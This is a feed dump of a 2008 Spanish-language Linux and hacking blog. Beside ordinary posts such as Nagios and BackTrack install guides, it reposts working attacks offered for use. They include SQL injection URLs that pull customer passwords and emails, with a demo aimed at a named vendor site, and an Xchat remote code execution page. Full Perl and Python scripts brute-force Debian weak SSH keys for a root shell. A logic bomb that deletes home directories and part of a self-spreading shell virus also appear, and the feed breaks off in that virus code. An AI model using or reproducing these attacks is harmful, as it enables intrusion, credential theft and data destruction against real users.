tag:blogger.com,1999:blog-119832842045234612009-07-02T16:37:06.199-05:00The zerial killer --> de Gnu/Linux y mas....zerial killerhttp://www.blogger.com/profile/14344870841054401136noreply@blogger.comBlogger67125tag:blogger.com,1999:blog-11983284204523461.post-71090029677722379372008-07-07T20:52:00.002-05:002008-07-07T21:06:05.785-05:00NOS MUDAMOS!!!!!Hola a todos me he cambiado para <a href="http://zerialkiller.h4ck3rx.org/"> www.zerialkiller.h4ck3rx.org </a> <br /><br />Nos vemos por alla XD .<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-7109002967772237937?l=zerialkiller.blogspot.com'/></div>zerial killerhttp://www.blogger.com/profile/14344870841054401136noreply@blogger.com0tag:blogger.com,1999:blog-11983284204523461.post-63121649292514683052008-07-04T19:06:00.002-05:002008-07-04T19:20:00.253-05:00Nagios en debian lenny<a href="http://www.nagios.org/">Nagios</a> es un sistema de código abierto de monitorización de redes, máquinas, servicios, sistemas, filesystems... .Es muy flexible ya que permite definir distintos tipos de alertas en función de la disponibilidad de los objetos monitorizados.<br /><br />En este mi-ni tuto instalaremos la ultima versión de nagios, Versión 3.0.3. Para poder hacer funcionar nagios necesitamos tener instalado apache, en mi caso sera apache2 (yo lo tengo con soporte a php y a mysql pero creo que no es necesario tener eso solo con el apache es mas que suficiente) .<br /><br />Si no tienes apache basta con teclear los siguiente.<br /><br />#apt-get install apache2<br /><br />ahora necesitamos el entorno de compilacion.<br /><br />#apt-get install build-essential<br /><br />Necesitaremos las siguientes librerías para la compilación de nagios<br /><br />#apt-get install libjpeg62 libjpeg62-dev libpng12-0 libpng12-dev<br /><br />Tambien necesitaremos las librerías gd2.<br /><br />TODO LO QUE DESCARGEMOS LO GUARDAREMOS EN /tmp . <br /><br />#cd /tmp<br />#wget -c http://www.libgd.org/releases/gd-2.0.35.tar.gz ---> descargamos gd2<br />#tar xzf gd-2.0.35.tar.gz ---> descomprimimos gd2<br />#cd gd-2.0.35 ---> accedemos al directorio de gd2<br /><br />ahora el proceso de configuracion y compilacion.<br />#./configure<br />#make <br />#make install<br /><br />ahora creamos los usuarios y grupos necesarios.<br /><br />#useradd nagios ---> creamos el usuario nagios<br />#passwd nagios ---> password para nagios <br />#groupadd nagios ---> añadimos el grupo<br />#groupadd nagcmd ---> otro mas<br />#usermod -G nagios nagios <br />#usermod -G nagios tu_usuario<br />#usermod -G nagcmd nagios<br />#usermod -G nagcmd www-data<br /><br />Ya tenemos los usuarios para Nagios, para el Apache y el nuestro propio para poder editar los ficheros de configuración. <br />Ahora a compilar y configurar nagios.<br /><br />Descargamos nagios y sus Plugins de su pagina oficial y los guardamos en /tmp<br /><a href="http://www.nagios.org/">Nagios ---> www.nagios.org</a> <br /><br />o tmb de <a href="http://sourceforge.net/">sourceforge </a> aquí les dejo los enlaces directos de la vercion 3.0.3 de nagios y de sus plugins.<br /><br /><a href="http://sourceforge.net/project/downloading.php?groupname=nagios&filename=nagios-3.0.3.tar.gz&use_mirror=osdn"> Nagios 3.0.3</a><br /><br /> <a href="http://sourceforge.net/project/downloading.php?group_id=29880&use_mirror=internap&filename=nagios-plugins-1.4.12.tar.gz&64975492">PLUGINS</a><br /><br /><a href="http://sourceforge.net/project/downloading.php?groupname=nagios&filename=nrpe-2.12.tar.gz&use_mirror=internap"> PLUGINS</a><br /><br />ahora bien accedemos al directorio donde las descargamos<br /><br />#cd /tmp --> directorio en donde descargue nagios y plugins <br />#tar xzf nagios-3.0.3.tar.gz ---> descomprimimos nagios <br /># tar xzf nagios-plugins-1.4.12.tar.gz ---> descomprimimos los plugins<br /><br />una ves descomprimidos los plugins y nagios pasaremos ala parte de compilación, primero entramos al directorio de nagios.<br /><br />#cd nagios-3.0.3<br />#./configure --with-command-group=nagcmd<br />#make all<br />#make install<br />#make install-init<br />#make install-config<br />#make install-commandmode<br />#make install-webconf<br /><br />ahora pasaremos al directorio de los plugins para su configuración.<br /><br />#cd /tmp/nagios-plugins-1.4.12<br /><br />#./configure --with-nagios-user=nagios --with-nagios-group=nagios<br />#make<br />#make install<br /><br />ahora toca crear una contraseña para el usuario nagiosadmin y reiniciar el Apache.<br /><br />#htpasswd -c /usr/local/nagios/etc/htpasswd.users nagiosadmin<br />#cd /etc/init.d/<br />#./apache2 restart<br /><br />Arrancamos el Nagios.<br /><br />#./nagios start<br /><br />ahora abrimos nuestro navegador y tecleamos http://localhost/nagios/<br />deberá mostrarnos una ventana de login para el usuario de nagios y su respectiva contraseña, después de teclear el user y el pass correctamente accederemos a nagios.<br /><br />Podemos crear un enlace para el arranque automático <br /><br />#ln -s /etc/init.d/nagios /etc/rcS.d/S99nagios<br /><br />aki una pantalla del buen Nagios.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_OdUSaKBFEPk/SG67lvjtuUI/AAAAAAAAAJY/aJAq8wMWTsc/s1600-h/nagios.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp3.blogger.com/_OdUSaKBFEPk/SG67lvjtuUI/AAAAAAAAAJY/aJAq8wMWTsc/s200/nagios.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5219315275264801090" /></a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-6312164929251468305?l=zerialkiller.blogspot.com'/></div>zerial killerhttp://www.blogger.com/profile/14344870841054401136noreply@blogger.com0tag:blogger.com,1999:blog-11983284204523461.post-61497346027857186352008-07-02T13:01:00.002-05:002008-07-02T13:06:45.355-05:0010 razones de que Windows Vista es un buen sistema operativoWTF que PTM es esto °_° ¬¬ NO MAMEN .<br /><br />Pondre el articulo tal y como lo encontre.<br /> <br />El sistema operativo Windows Vista ha recibido algunas críticas desde su lanzamiento hace más de un año. ¿Pero es realmente un sistema que "deja mucho que desear"?. El sitio Gizmodo presenta 10 razones que sugieren lo contrario. <br /><br />Diario Ti: Con el fin de contrarrestar las opiniones en el sentido que Windows Vista sería un sistema operativo inconcluso y deficiente, el sitio Gizmodo ha publicado un análisis, con una lista de las 10 razones que convierten a Windows Vista en una buena opción.<br /><br />1. Windows Vista es más seguro que Windows XP.<br />2. El interfaz de Windows Vista es mucho más atractivo que todas las versiones anteriores de Windows.<br />3. Windows Vista tiene una óptima capacidad de ejecución de juegos, muy similar a Windows XP.<br />4. El Media Center de Vista es excelente para la grabación de vídeo.<br />5. La función de suspensión de Windows Vista funciona “de maravillas".<br />6. La función User Account Control es altamente beneficiosa para “numerosos" usuarios.<br />7. El soporte para conectores es óptimo en Windows Vsta.<br />8. No hay más bugs (errores de código) en Windows Vista que en Windows XP.<br />9. Al contar con suficiente RAM, Windows Vista no es lento.<br />10. La función de búsqueda en el disco duro es óptima.<br /><br />En todo caso, el autor del artículo no se muestra incondicionalmente positivo frente a Windows Vista. Hay varios puntos que le gustaría fuesen distintos. Por ejemplo, algunas conocidas funciones de Windows XP han sido cambiadas de lugar, lo que prolonga innecesariamente el tiempo de adaptación al software. Otro elemento que le causa molestia es la configuración de redes, que considera innecesariamente demorosa.<br /><br />La argumentación completa puede ser vista en el sitio de Gizmodo (ver enlace).<br /><br />Fuente : <a href="http://www.diarioti.com/gate/n.php?id=18304">DiarioTI</a><br /><br />JAAJJAAJ posiblemente tengan razon son 10 razones por las que guindous vista es "bueno", pero yo a gnu/linux le encuentro facil mas de 50 =)<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-6149734602785718635?l=zerialkiller.blogspot.com'/></div>zerial killerhttp://www.blogger.com/profile/14344870841054401136noreply@blogger.com0tag:blogger.com,1999:blog-11983284204523461.post-25503558071552968012008-07-01T19:29:00.005-05:002008-07-01T19:52:37.800-05:00MEME: BlogsEste es un Tipo de “meme” que vi en un sitio de por hay que trata sobre los blogs.<br /><br /><br />5 amigos cuyos blogs sin duda disfrutaría leer<br /><br />1-http://gndx.org/<br />2-http://movimientolibre<br />3-http://fivenix.blogspot.com/<br />4-http://www.antoniomtz.org/<br />5-http://www.riveonline.com/<br /><br />5 blogs que leería con placer morboso Y/O ociosos<br /> <br />1-http://www.socwall.com/<br />2-http://www.totallygeek.com/vscdb/index.php<br />3-http://linuxman.blogsome.com/<br />4-http://www.gnome-look.org/<br />5-http://art.gnome.org/<br /><br />5 blogs que nunca leería<br /><br />1-Uno sobre Lopez obrador <br />2-Uno sobre Porno Infantil <br />3-Uno sobre Putos -->Como el hiram y sus metroflogs<br />4-Uno sobre pokemon --> JAJA<br />5-Uno sobre Guindows --> JOJOJO<br /><br />5 blogs recomendables (pues mas que nada son mis webs favoritas ) <br /><br />1-http://www.milw0rm.com/<br />2-http://packetstormsecurity.org/<br />3-http://www.remote-exploit.org/<br />4-http://www.securityfocus.com/<br />5-http://www.metasploit.com/<br /><br /><br />este meme se lo dejo a: <a href="http://gndx.org/">GNDX</a> <a href="http://jorgemorales.com.mx/">Jmorales</a> <a href="http://fivenix.blogspot.com/">PAkO V. (cerillo)</a> <a href="http://www.antoniomtz.org/">Antonio Martinez</a> <a href="http://www.riveonline.com/">Rive</a> <a href="http://thebucio.org/">bucio</a> y a quien lo quiera contestar.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-2550355807155296801?l=zerialkiller.blogspot.com'/></div>zerial killerhttp://www.blogger.com/profile/14344870841054401136noreply@blogger.com0tag:blogger.com,1999:blog-11983284204523461.post-54061724151905105952008-06-30T01:14:00.002-05:002008-06-30T01:16:47.805-05:00Remote SQL injection## AUTHOR : JuDge<br /> <br /> ## AUTHOR Email:spamm3r@windowslive.com,eslamwaheed50@hotmail.com<br /> <br /> ## Script WebSite:http://www.eshop100.co.uk<br /><br /> ##Dork::)<br /><br />##DescRipTiON: pull customers info from database<br /> <br />##EXPLOITS:<br /> www.victim.com/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*<br /> <br /><br /> ##Demo:http://www.eshop100.co.uk/demo/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*<br /><br /><br /><br /><br /><br /><br /><br />#AcmlmBoard v1.A2 SQL Injection Vulnerability<br />#<br />######################<br />#<br />#Bug by: h0yt3r<br />#<br />#Dork: "AcmlmBoard v1.A2"<br />#<br />##<br />###<br />##<br />#<br />#This Board Software suffers from some not correctly verified variables which are used in SQL Querys.<br />#An Attacker can easily get sensitive information from the database by<br />#injecting unexpected SQL Querys.<br />#<br />#SQL Injection:<br />#http://[target]/[path]/memberlist.php?sort=&pow=[SQL]<br />#<br />#PoC:<br />#memberlist.php?sort=&pow=9%20union%20select%201,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16%20from%20users--+<br />#<br />#######################<br />#<br />#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team!<br />#<br />#######################<br />#######################<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-5406172415190510595?l=zerialkiller.blogspot.com'/></div>zerial killerhttp://www.blogger.com/profile/14344870841054401136noreply@blogger.com0tag:blogger.com,1999:blog-11983284204523461.post-56241258878190554492008-06-28T12:48:00.001-05:002008-06-28T12:51:23.636-05:00video en YouTube, donde invita a descargar ilegalmente músicaKid Rock ha publicado un video en YouTube, donde invita a descargar ilegalmente música - o en sus propias palabras, a robar música. <br />Como si lo anterior no fuera suficiente, luego exhorta al público a robar todo lo que se le antoje; automóviles, gasolina, música y películas. “Todo lo que necesites".<br /><br />aqui al link: <a href="http://mx.youtube.com/user/kidrockvideos?ob=4">KID ROCK --> roba todo lo que puedas</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-5624125887819055449?l=zerialkiller.blogspot.com'/></div>zerial killerhttp://www.blogger.com/profile/14344870841054401136noreply@blogger.com0tag:blogger.com,1999:blog-11983284204523461.post-2006899871482053882008-06-27T11:19:00.002-05:002008-06-27T11:26:05.953-05:00Una Guia Linuxera, Para un WindoleroHola que tal, navegando ayer por el foro de <a href="http://foro.elhacker.net/">elhacker</a> me encontré esta guía para los novatos o como el titulo lo dice para un wuindulero =) bueno e aquí el link<br /><br /><a href="http://portallinux.wordpress.com/2008/06/26/una-guia-linuxera-para-un-windolero/"> Una Guia Linuxera, Para un Windolero </a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-200689987148205388?l=zerialkiller.blogspot.com'/></div>zerial killerhttp://www.blogger.com/profile/14344870841054401136noreply@blogger.com0tag:blogger.com,1999:blog-11983284204523461.post-61386770008309857702008-06-23T02:12:00.004-05:002008-06-24T21:04:55.331-05:00Como Instalar Back|Track 3Primero que nada tienes que tener lla echa una particion. Con 4 GB es mas que suficiente. Corremos el live cd de bactrac3 y abrimos una shell y comenzamos<br /><br />bt~#mkdir /mnt/backtrack3 ---> creamos una carmeta dentro /mnt<br />bt~#mount /dev/sda10 /mnt/backtrack3/ --> montamos la particion donde queremos instalar /dev/sda10<br />bt~#mkdir /mnt/backtrack3/boot/ ---> creamos otro directorio<br />bt~#cp --preserve -R /{bin,dev,home,pentest,root,usr,etc,lib,opt,sbin,var} /mnt/backtrack/ ---> instalamos tardara unos minutos <br /><br />####----> despues de que termine con la instalacion terminamos con esto. -----------####<br /><br />bt~#mkdir /mnt/backtrack3/{mnt,proc,sys,tmp}<br />bt~#mount --bind /dev/ /mnt/backtrack3/dev/<br />bt~#mount -t proc proc /mnt/backtrack3/proc/<br />bt~#cp /boot/vmlinuz /mnt/backtrack3/boot/<br /><br />Para agregarlo al grub en mi cas solo edite el archivo menu.lst de mi debian.<br /><br /><br /><br />bt ~ # fdisk -l<br /><br />Disk /dev/sda: 60.0 GB, 60011642880 bytes<br />255 heads, 63 sectors/track, 7296 cylinders<br />Units = cylinders of 16065 * 512 = 8225280 bytes<br /><br /> Device Boot Start End Blocks Id System<br />/dev/sda1 * 1 34 273073+ 83 Linux<br />/dev/sda2 35 7296 58332015 5 Extended<br />/dev/sda5 35 642 4883728+ 83 Linux<br />/dev/sda6 643 1007 2931831 83 Linux<br />/dev/sda7 1008 1337 2650693+ 82 Linux swap<br />/dev/sda8 1338 1386 393561 83 Linux<br />/dev/sda9 1387 6019 37214541 83 Linux<br />/dev/sda10 6020 7296 10257471 83 Linux<br /><br />Disk /dev/sdb: 123.5 GB, 123522416640 bytes<br />255 heads, 63 sectors/track, 15017 cylinders<br />Units = cylinders of 16065 * 512 = 8225280 bytes<br /><br /> Device Boot Start End Blocks Id System<br />/dev/sdb1 * 1 15017 120624021 7 HPFS/NTFS<br /><br />como podran ver fue en la /dev/sda10 donde instale el back|track3<br />entonses:<br /><br />Entre en el archivo menu.lst de debian y lo edite<br /><br />#nano /boot/grub/menu.lst<br /><br />title Back|track3<br />root (hd0,9)<br />kernel /boot/vmlinuz root=/dev/sda10 ro<br /><br />con eso fue mas que suficiente para tener back|track3 en mi HD.<br /><br />aqui el link para descargar <a href="http://remote-exploit.org/backtrack_download.html"> BACK|TRACK3 </a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-6138677000830985770?l=zerialkiller.blogspot.com'/></div>zerial killerhttp://www.blogger.com/profile/14344870841054401136noreply@blogger.com0tag:blogger.com,1999:blog-11983284204523461.post-56610771743270310422008-06-18T20:00:00.004-05:002008-06-18T20:14:07.813-05:00Instalar emeseneemsn es un cliente de mensageria similar al msn. la verdad en lo personal aun prefiero pidgin pero pues siempre hay mas altertativas que probar.<br /><br />Primero editamos nuestro sources.list<br /><br />#pico /etc/apt/sources.list<br /><br />Y agregamos los repos.<br /><br />deb http://apt.emesene.org/ ./<br />deb-src http://apt.emesene.org/ ./<br /><br />haora.<br /><br />#apt-get update<br /><br />y haora instalamos.<br /><br />#apt-get install emesene <br /><br />Y listo.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-5661077174327031042?l=zerialkiller.blogspot.com'/></div>zerial killerhttp://www.blogger.com/profile/14344870841054401136noreply@blogger.com2tag:blogger.com,1999:blog-11983284204523461.post-36660567157189023922008-06-13T12:11:00.003-05:002008-06-13T12:26:23.343-05:00Xchat <= 2.8.7b Remote Code Execution##################################################################################################################<br />#<br /># Xchat <= 2.8.7b Remote Code Execution (tested on Windows XP SP1+SP2+SP3, IE6 & IE7 fully patched)<br /># Vendor : http://xchat.org/<br /># Affected Os : Windows *<br /># Risk : critical<br />#<br /># This bug is related to the URI Handler vulnerability but the approch is a bit different.<br /># We don't use any % or ../../../ as the others related bugs, just a single "<br /># According to the registry , when the IRCS:// URI is called , the command launched is :<br /># C:\Program Files\xchat\xchat.exe --existing --url="%1"<br />#<br /># The xchat --help option tells us :<br /># " --command=COMMAND :Send a command to existing xchat "<br />#<br /># So we add a simple " at the end of the URL and we're in business ?<br /># Yep =) ircs://blabla@3.3.3.3" --command "shell calc"<br />#<br /># Note: The victim needs to be connected to an irc server , and also need IE * .<br />#<br />#<br />#<br /># Greetz: French/Quebec community, http://spiritofhack.net/<br />#<br /># "If in times like theses you can talk about individual freedoom, you're propably a terrorist"<br />#<br /># Poc: this only launch the calc, sky is the limit passed this point.<br /><br />html<br /> head title Welcome to my personal website /title /head<br /> body<br /> script document.location='ircs://blabla@3.3.3.3" --command "shell calc"'/script<br /> /body<br /> /html <br /><br /><br /><br />###http://www.milw0rm.com/#####<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-3666056715718902392?l=zerialkiller.blogspot.com'/></div>zerial killerhttp://www.blogger.com/profile/14344870841054401136noreply@blogger.com0tag:blogger.com,1999:blog-11983284204523461.post-14195412332150382452008-06-11T00:10:00.002-05:002008-06-11T00:13:42.963-05:00P2P =)<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_OdUSaKBFEPk/SE9e97UMTxI/AAAAAAAAAJI/N-ZE9WekB_Y/s1600-h/p2p.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp0.blogger.com/_OdUSaKBFEPk/SE9e97UMTxI/AAAAAAAAAJI/N-ZE9WekB_Y/s320/p2p.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5210487711878369042" /></a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-1419541233215038245?l=zerialkiller.blogspot.com'/></div>zerial killerhttp://www.blogger.com/profile/14344870841054401136noreply@blogger.com0tag:blogger.com,1999:blog-11983284204523461.post-41687139317734582872008-06-02T15:42:00.001-05:002008-06-02T15:46:40.712-05:00Exploit SSH ---> OpenSSLdandome unas visitas por milworm encontre :
<br />
<br />Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit
<br />
<br />the debian openssl issue leads that there are only 65.536 possible ssh
<br />keys generated, cause the only entropy is the pid of the process
<br />generating the key.
<br />
<br />This leads to that the following perl script can be used with the
<br />precalculated ssh keys to brute force the ssh login. It works if such a
<br />keys is installed on a non-patched debian or any other system manual
<br />configured to.
<br />
<br />On an unpatched system, which doesn't need to be debian, do the following:
<br />
<br />keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/
<br />
<br />1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
<br /> http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
<br />
<br />2. Extract it to a directory
<br />
<br />3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
<br />Bits, generated on an upatched debian (this is the key this exploit will
<br />break)
<br />
<br />4. Run the perl script and give it the location to where you extracted
<br />the bzip2 mentioned.
<br />
<br />#!/usr/bin/perl
<br />my $keysPerConnect = 6;
<br />unless ($ARGV[1]) {
<br /> print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
<br /> print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
<br /> print "By mm@deadbeef.de\n";
<br /> exit 0;
<br />}
<br />chdir($ARGV[0]);
<br />opendir(A, $ARGV[0]) || die("opendir");
<br />while ($_ = readdir(A)) {
<br /> chomp;
<br /> next unless m,^\d+$,;
<br /> push(@a, $_);
<br /> if (scalar(@a) > $keysPerConnect) {
<br /> system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
<br />".$_ } @a)." ".$ARGV[1]);
<br /> @a = ();
<br /> }
<br />}
<br />
<br />5. Enjoy the shell after some minutes (less than 20 minutes)
<br />
<br />Regards,
<br />Markus Mueller
<br />mm@deadbeef.de
<br />
<br /># milw0rm.com [2008-05-15]
<br />
<br />
<br />
<br />Y TAMBIEN
<br />
<br />Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)
<br />
<br />
<br />#!/bin/python
<br /># This program is free software; you can redistribute it and/or modify
<br /># it under the terms of the GNU General Public License as published by
<br /># the Free Software Foundation; either version 2 of the License, or
<br /># (at your option) any later version.
<br />#
<br /># This program is distributed in the hope that it will be useful,
<br /># but WITHOUT ANY WARRANTY; without even the implied warranty of
<br /># MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
<br /># GNU General Public License for more details.
<br />#
<br /># You should have received a copy of the GNU General Public License
<br /># along with this program; if not, write to the Free Software
<br /># Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
<br /># MA 02110-1301, USA.
<br />############################################################################
<br /># Autor: hitz - WarCat team (warcat.no-ip.org)
<br /># Collaborator: pretoriano
<br />#
<br /># 1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
<br /># http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
<br />#
<br /># 2. Extract it to a directory
<br />#
<br /># 3. Execute the python script
<br /># - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5
<br /># - execute: python exploit.py (without parameters) to display the help
<br /># - if the key is found, the script shows something like that:
<br /># Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121
<br /># Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240
<br />############################################################################
<br />
<br />
<br />import Queue
<br />import os
<br />import string
<br />import time
<br />from threading import Thread
<br />import sys
<br />
<br />#This class only has a boolean, which will be True if some thread find the key
<br />class End():
<br /> def __init__(self):
<br /> self.end = False
<br />
<br /> def Finish(self):
<br /> self.end = True
<br />
<br /> def GetEnd(self):
<br /> return self.end
<br />
<br />
<br />#This is the thread class
<br />class Connection(Thread):
<br /> def __init__(self,QueueDir,TheEnd,dir,host,user,port='22'):
<br /> Thread.__init__(self)
<br /> self.QueueDir = QueueDir
<br /> self.TheEnd = TheEnd
<br /> self.dir = dir
<br /> self.host = host
<br /> self.user = user
<br /> self.port = port
<br />
<br /> def run(self):
<br /> while (not self.TheEnd.GetEnd()) and (not self.QueueDir.empty()):
<br /> key = self.QueueDir.get()
<br />
<br /> cmd = 'ssh -l ' + self.user
<br /> cmd = cmd + ' -p ' + self.port
<br /> cmd = cmd + ' -o PasswordAuthentication=no'
<br /> cmd = cmd + ' -i ' + self.dir + '/' + key
<br /> cmd = cmd + ' ' + self.host + ' exit; echo $?'
<br />
<br /> pin,pout,perr = os.popen3(cmd, 'r')
<br /> pin.close()
<br />
<br /> #To debug descoment the next line. This will show the errors reported by ssh
<br /> #print perr.read()
<br />
<br /> if pout.read().lstrip().rstrip() == '0':
<br /> self.TheEnd.Finish()
<br /> print ''
<br /> print 'Key Found in file: '+ key
<br /> print 'Execute: ssh -l%s -p%s -i %s/%s %s' %(self.user,self.port,self.dir,key,self.host)
<br /> print ''
<br />
<br />print '\n-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org'
<br />
<br />if len(sys.argv) < 4:
<br /> print './exploit.py <dir> <host> <user> [[port] [threads]]'
<br /> print ' <dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash'
<br /> print ' <host>: The victim host'
<br /> print ' <user>: The user of the victim host'
<br /> print ' [port]: The SSH port of the victim host (default 22)'
<br /> print ' [threads]: Number of threads (default 4) Too big numer is bad'
<br />
<br /> sys.exit(1)
<br />
<br />dir = sys.argv[1]
<br />host = sys.argv[2]
<br />user = sys.argv[3]
<br />
<br />if len(sys.argv) <= 4:
<br /> port='22'
<br /> threads=4
<br />else:
<br /> if len(sys.argv) <=5:
<br /> port=sys.argv[4]
<br /> threads = 4
<br />
<br /> else:
<br /> port=sys.argv[4]
<br /> threads = sys.argv[5]
<br />
<br />ListDir = os.listdir(dir)
<br />QueueDir=Queue.Queue()
<br />TheEnd = End()
<br />
<br />for i in range(len(ListDir)):
<br /> if ListDir[i].find('.pub') == -1:
<br /> QueueDir.put(ListDir[i])
<br />
<br />initsize = QueueDir.qsize()
<br />tested = 0
<br />
<br />for i in range(0,int(threads)):
<br /> Connection(QueueDir,TheEnd,dir,host,user,port).start()
<br />
<br />
<br />while (not TheEnd.GetEnd()) and (not QueueDir.empty()):
<br /> time.sleep(5)
<br /> actsize = QueueDir.qsize()
<br /> speed = (initsize - tested - actsize)/5
<br /> tested = initsize - actsize
<br />
<br /> print 'Tested %i keys | Remaining %i keys | Aprox. Speed %i/sec' %(tested,actsize,speed)
<br />
<br /># milw0rm.com [2008-06-01]
<br />
<br />
<br /><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-4168713931773458287?l=zerialkiller.blogspot.com'/></div>zerial killerhttp://www.blogger.com/profile/14344870841054401136noreply@blogger.com1tag:blogger.com,1999:blog-11983284204523461.post-77236442112574692772008-05-31T16:08:00.002-05:002008-05-31T16:24:33.558-05:00MetagoofilMetagoofil es una Herramienta para obtener información de documentos públicos. Metagoofil nos ayuda a obtener una lista de usuarios, para poder realizar ataques de fuerza bruta sobre los servicios disponibles (FTP, VPN, Aplicaciones WEB, POP3).<br /><br />Metagoofil es una herramienta que se encarga de extraer Meta-Data (Datos sobre los Datos), de ciertos ficheros accesibles en los webs del "objetivo".<br /><br />Si Quieren saber como funciona cheken la web de <a href="http://www.s21sec.com/metagoofil/metagoofil.html">Metagoofil</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-7723644211257469277?l=zerialkiller.blogspot.com'/></div>zerial killerhttp://www.blogger.com/profile/14344870841054401136noreply@blogger.com0tag:blogger.com,1999:blog-11983284204523461.post-56981821262861734722008-05-27T20:38:00.001-05:002008-05-27T20:41:02.030-05:00Bombas lógicasLas bombas lógicas son en cierta forma similares a los troyanos: se trata de código insertado en programas que parecen realizar cierta acción útil. Pero mientras que un troyano se ejecuta cada vez que se ejecuta el programa que lo contiene, una bomba lógica sólo se activa bajo ciertas condiciones, como una determinada fecha, la existencia de un fichero con un nombre dado, o el alcance de cierto número de ejecuciones del programa que contiene la bomba; así, una bomba lógica puede permanecer inactiva en el sistema durante mucho tiempo sin activarse y por tanto sin que nadie note un funcionamiento anómalo hasta que el daño producido por la bomba ya está hecho. Por ejemplo, imaginemos la misma situación que antes veíamos para el troyano: alguien con el suficiente privilegio renombra a vi como vi.old, y en el lugar del editor sitúa el siguiente código:<br /><br />#!/bin/sh<br />if [ `date +%a` = "Sun" ]; <br /> then<br /> rm -rf $HOME<br /> else<br /> vi.old $1<br />fi<br /><br />Este cambio en el sistema puede permanecer durante años sin que se produzca un funcionamiento anómalo, siempre y cuando nadie edite ficheros un domingo; pero en el momento en que un usuario decida trabajar este día, la bomba lógica se va a activar y el directorio de este usuario será borrado.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-5698182126286173472?l=zerialkiller.blogspot.com'/></div>zerial killerhttp://www.blogger.com/profile/14344870841054401136noreply@blogger.com0tag:blogger.com,1999:blog-11983284204523461.post-21071868781449545062008-05-27T20:24:00.001-05:002008-05-27T20:33:20.662-05:00Applets hostilesEn los últimos años, con la proliferación de la web, Java y Javascript, una nueva forma de malware se ha hecho popular. estos instentan monopolizar o explotar los recursos del sistema de una forma inapropiada, esto incluye desde ataques clásicos como negaciones de servicio o ejecución remota de programas en la máquina cliente hasta amenazas mucho más elaboradas, como difusión de virus, ruptura lógica de cortafuegos o utilización de recursos remotos para grandes cálculos científicos. <br /><br />Como ejemplo de applet hostil - aunque este en concreto no es muy peligroso - tenemos el siguiente código, obra de Mark D. LaDue (1996):<br /><br />zkk:~/Security# cat Homer.java<br />import java.io.*;<br /><br />class Homer {<br /> public static void main (String[] argv) {<br /> try {<br /> String userHomer = System.getProperty("user.home");<br /> String target = "$HOME";<br /> FileOutputStream outer = new <br /> FileOutputStream(userHome + "/.homer.sh");<br /> String homer = "#!/bin/sh" + "\n" + "#-_" + "\n" +<br /> "echo \"Java is safe, and UNIX viruses do not exist.\"" + "\n" +<br /> "for file in `find " + target + " -type f -print`" + "\n" + "do" +<br /> "\n" + " case \"`sed 1q $file`\" in" + "\n" +<br /> " \"#!/bin/sh\" ) grep '#-_' $file > /dev/null" +<br /> " || sed -n '/#-_/,$p' $0 >> $file" + "\n" +<br /> " esac" + "\n" + "done" + "\n" + <br /> "2>/dev/null";<br /> byte[] buffer = new byte[homer.length()];<br /> homer.getBytes(0, homer.length(), buffer, 0);<br /> outer.write(buffer);<br /> outer.close();<br /> Process chmod = 